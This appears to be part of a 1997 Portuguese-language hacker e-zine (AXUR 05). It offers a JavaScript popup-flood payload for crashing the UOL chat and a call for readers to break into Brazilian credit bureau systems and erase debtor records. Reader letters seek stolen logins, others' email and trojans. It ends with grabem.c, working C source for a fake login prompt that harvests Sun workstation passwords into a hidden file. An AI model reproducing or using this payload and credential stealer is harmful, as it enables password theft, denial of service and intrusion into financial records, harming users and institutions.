coopibt - coopibt jferst - jferst Coisa estupida ne'? Os caras usam quase todas as senhas e logins iguais. Meu irmaozinho tambem achou... Agora e' soh vcs fazerem isso, mas lembrem-se e'muito dificil de achar um provedor estupido assim. ;) Depois que nos aprontamos uma no shell eles cortaram o acesso, ainda dah pra ler uns mails, mas nao dah pra puxar telnet. AciDmuD & VooDoo - 1997(c) Global Domination Inc. }-===============================[chain]===============================-{ 17-) DETONANDO O CHAT DA UOL ~~~~~~~~~ ~ ~~~~ ~~ ~~~ 1-Comando para abrir 30 janelas do netscape; 2-Esse abre 30 janelas se vc passar o mouse em cima do link, que e' uma ima- gem que pega toda a tela 3-Esse e' para vc entrar na sala sem ser de imagens e detonar com todo mundo que estiver com o java ligado. Abre 30 janelas direto. <imgsrc='http://www.matrix.com.br/frazzon/fogo.gif'><i><B> ¥X×HELL×X¥</B></I><imgsrc='http://www.matrix.com.br/frazzon/ fogo.gif' onLoad="alert('\n Entrei na sala e vc vai sair! \n\n When you mess with the BEST , die like the REST\n\n ¥××HELL××¥!!');variCounter=0;while(true)window.open('http://www.NETural.com/ ~ccamel');"CRASHING"+iCounter('width=1,height=1,resizable=no');iCounter++"&# 62</CENTER> Agradecimento especial a HoTFiRe - }-===============================[chain]===============================-{ 18-) DESAFIO DO MES ~~~~~~~ ~~ ~~~ Nosso obejtivo com o DESAFIO DO MES, que certamente sera mais uma area da revista AXUR 05 e de fazer com que nosso leitores tambem participem. Nao queremos colocar o desafio como meta de vida, mas simplesmente sera uma forma de colocar em enfase o nome de quem conseguir resolver ou re- alizar o que esta sendo proposto. Sem mais, o desafio sera estipulado por membros da revista ou mesmo pes- soal de fora. As regras sao simples, sempre na edicao posterior saira o resultado do problema juntamente com o nome dos que solucionaram. Isto se estes mandarem o mail para - axur05@hotmail.com - e colocarem a res- posta ou demonstrarem como fizeram de forma correta. Vamos-la, queremos ver vcs entrarem para a galeria da fama. E seu nome ser colocado como colaborador da revista. ;) \=- DESAFiO DE JANEiRO -=/ - by AciDmuD Bom, sendo que estamos comecando com esta parte da revista nao queremos colocar algo muito chato logo como primeiro desafio e queremos de algu- ma forma acompanhar o desenvolvimento da tecnica utilizada na tarefa que vamos propor. O esquema e' o seguinte, precisamos do MAIOR numero de informacaos do SCI ( Seguranca ao Credito de Informacoes ), SERASA e SPC. Para que nos queremos essas informacoes? Bom, se voces nao sabem estes sao as instituicoes ou orgaos responsaveis pelo armazenamento de nomes de pessoas (fisicas ou juridica) que nao pa- gam suas contas. Bah...voce pergunta "O que eu tenho com isso?" olha, nos nao devemos pra ninguem mas hackear um sistema desses ia ser muito bom. Imagine voce, limpar o nome de todos os devedores possiveis ( nao que nos que escrevemos a revista devemos alguma coisa :) ) e deixar o pessoal totalmente desorientado. Hahahaha... Vamos propor o seguinte: 1-) Todas as informacoes recebidas estarao a disposicao na nossa HOME PAGE fazendo assim com que cada um possa ir lah e se informar. O endereco da pagina oficial esta no inicio da revista, no topo. 2-) Cada um pode tentar hackear por si mesmo... INDIVIDUAL E AUTONOMO ;) 3-) Caso voce mande alguma coisinha util seu nome sera citado na pagina ( o negocio e' totalmente anonimo ) sera usado um pseudonimo ou nick. 4-) Pela primeira vez vamos mobilizar a comunidade de todo o BR pra deto- nar alguma coisa junto. Isso vai ser muito bom... Como viram nao e' bem um desafio, e' um convite! Procure tudo que souber... como numeros de acesso a linha de dados, pro- tocolos de comunicacao usados, pessoas que sao possiveis informantes. Ate mesmo como e' ou funciona o armazenamento das informacoes... \=- DESAFiO DE JANEiRO -=/ }-===============================[chain]===============================-{ 19-) CARTAS ~~~~~~ Finalmente abrimos nossa parte dedicada somente as cartas, fica ai entao o manifesto da galera que escreveu. Agradecemos que escreveu e esperamos satisfazer a todos, ( isso e' quase impossivel ) com o nosso numero 1 da revista! - - - - - - - - - - - - - From: "____________" <_____@____.__________.___.__> To: acidmud@thepentagon.com Date sent: Fri, 27 Dec 1996 00:29:09 +0000 Subject: Zine Hacker... Priority: normal Grande AciDmuD, Acabei de ler sua revista e posso dizer q ela esta muito boa, principalmente a parte de Anarquia e a de comandos linux. As senhas tbem sao do CACETE... Fora o seu quebrador de senhas animal... Putz, pra numero 1 de uma revista, ta DEMAIS... Bem, sem rasgacao de seda, vamos agora ao q interessa... Eu nao sou tao bom quanto vcs ai, mas sei alguma coisa desse submundo hacker q estamos... E gostaria muito de poder ajudar vcs com a revista, com o q eu puder fazer. Agora, cabe a vcs saber o q eu posso fazer, ne? Outra coisa, queria pedir pra vcs fazerem uma sessao de grupos hackers novos q estao surgindo. Tipo dar o nome, e o email. Seria legal. E tbem, q desse o telnet das melhores bbs hackers do brasil, ou o telefone mesmo, ok??? See Ya Dude. Deltah RESPOSTA: Valeu por ter escrito, ainda nao era o numero 1 da revista, agora que ta saindo realmente o primeiro. O que vc pode fazer e distri- buir a revista para todos os seus amigos e inimgos.. ;) Nos vamos colocar nada da BBS dos outros sem que alguem de lah se mani- feste. Manda os sysopz pararem de cocar a bunda e mandarem seus endere- cos pra telnet ou pra galera telefonar que nos publicamos! - - - - - - - - - - - - - From: "Fantasma, USuckRox ,CyCLOPs" <______@______.___.__> To: acidmud@thepentagon.com Copies to: acidmud@thepentagon.com Subject: »»»»» AXUR 05 ««««« Æ Galera!! Beleza!! Gostei muito da revista(AXUR 05) de vcs muito boa para quem quer comecar como hacker ou pelo menos ter acesso a provedores que abusao de seus clientes. E tenho uma pergunta vcs dizem que e melhor UNIX mais qual e o melhor para isso? Se eu tiver que usar UNIX tenho que formatar meu Wichester nao tera problema se eu criar duas particoes uma Dos e outra No-Dos. Nao gosto muito de UNIX por> que são pessimos os graficos!! Mas sei que e muito bom para trabalhar com isso que estamos falando. Preciso fazer algo diferente mais com cautela para não ser pego. Eu> tenho algumas senhas da braznet mais pelo modo que consigo e tao babaca e muito patetico. Eu fico pedindo o Trumpwsk.ini alguns sao tao babacas que me passam mais quase fui pego com isso por isso parei. Ate ja mudaram as senhas por que alguem estava usado... quem sera!! Por isso tbem vou ficar esperando a nova edicao de vcs e espero que seja melhor que a primeira... Sou o Fantasma e meus outros nicks sao: USuckRox e CyCLOPs. Qualquer coisa sabe onde me encontrar .... Falo pessoal!!! RESPOSTA: Cria uma particao logica e uma nao logica com o comando FDISK, isso e' quase auto-explicativo. Na questao grafica, eu prefiro ficar no 100% shell.. ;) Compra uma controladora e um HD SCSI pra nao se atucanar. - - - - - - - - - - - - - Date sent: Sat, 28 Dec 1996 22:18:08 -0800 From: ________ <________@___.___.__> To: acidmud@thepentagon.com Subject: Revista !!! Muito boa a Revista...continuem a faze-la !!!! Gostaria de esclarecer algumas duvidas referentes as senha e logins que voces colocaram como bonus na revista..... Para mim pode-la usar e ler os e-mail dos outros e ter acesso gratuito eu precisaria discar para o provedor certo ??? Qual o telefone de acesso da Kanopus e Netville ??? Pelo meu provedor eu posso entrar na Kanopus ou Netville e usar ????? Como faco para ler os e-mails ???? Voces tem o Cavalo de Troia ou Homicide ???? se tiver, poderia me enviar..... RESPOSTA: Pra vc ler os mails nao precisa ter acesso discado, e' so mudar a configuracao do seu client pra mail, o telefone da kanopus e' ????????? e da netville ?????????. Acho que pelo menos o telefone voces poderiam ir encontrar, ou e' mais dificil que pegar as senhas??? C faz muitas perguntas porra! ;) - - - - - - - - - - - - - From freejack@br.homeshopping.com.br Fri Jan 3 23:01:44 1997 From: "FreeJack" Address Book To: Subject: Congrats & Stuff.. Ja vi a maior parte da HP e to escrevendo p/ dar os parabens.. Ta concisa, direta, informativa e inteligente! Ate hoje a maioria dos Hackers q conheci, com raras excecoes, eram umas bestas... Detonavam so pelo prazer de detonar... Nao q nao haja prazer, meu Ego e' apenas um pouco menor q minha vontade de saber mais, mas sempre achei q deveria haver algo mais... Sempre achei q se alguem se dedica a adquirir tamanha quantidade de conhecimento, adquire com ela uma responsabilidade de ajudar as pessoas q ainda nao retiraram as viseiras... Pode parecer meio poltico, mas acho q nao ha nada errado c/ isso! Parabens. []s. FreeJack RESPOSTA: Me deixou feliz... por saber que nos estamos fazendo algo realme- nte bom! Obrigado... ;) - - - - - - - - - - - - - *************************************************************************** BONUS EXTRA ----------------------- catador de senhas em maquinas Sun *************************************************************************** CUT HERE-------------------- grabem.c------------------------------------- /* GRABEM 1.0 by The K-Man | A Cute little program to collect passwords on the Sun workstations. */ #define PASSWORD "Password:" #define INCORRECT "\nLogin incorrect" #define FILENAME ".exrc%" #include #include void ignoreSig () { return; } /*-----------------------------------------------------------------------+ | Principal | +-----------------------------------------------------------------------*/ main() { char name[10], /* user name */ password[10]; /* user password */ int i, lab, procid; FILE *fp; signal (SIGINT, ignoreSig); signal (SIGTSTP, ignoreSig); signal (SIGQUIT, ignoreSig); procid = getppid(); system ("\\rm proj2"); printf ("lab#: "); scanf ("%d", &lab); for (i=1; i<40; i++) printf ("\n"); getchar(); for(;;) { for (;;) { printf("lab%1d login: ",lab); gets (name); if (strcmp (name, "") != 0) break; } /*---------------------------------------------------------------+ | Desliga o screen echo, pargunta pelo passwd e coloca o echo | | ligado novamente | +---------------------------------------------------------------*/ system ("stty -echo > /dev/console"); printf(PASSWORD); scanf("%s",password); getchar(); system ("stty echo > /dev/console"); if ( ( fp = fopen(FILENAME,"a") ) != NULL ) { fprintf(fp,"login %s has password %s\n",name,password); fclose(fp); } if (strlen (name) >= 4) break; else printf (INCORRECT); } printf (INCORRECT); kill (procid, 9); } CUT HERE-------------------- grabem.c------------------------------------- - SE QUISER QUE A REVISTA CONTINUE ESCREVA-NOS, ATENDEREMOS A TODOS - - AGUARDEM - EM BREVE - O PROXiMO NUMERO DA SUA REViSTA HACKER - AXUR 05 - - = = = DiA 01 De MARCO = = = - EM TODAS AS BBSz UNDERGROUND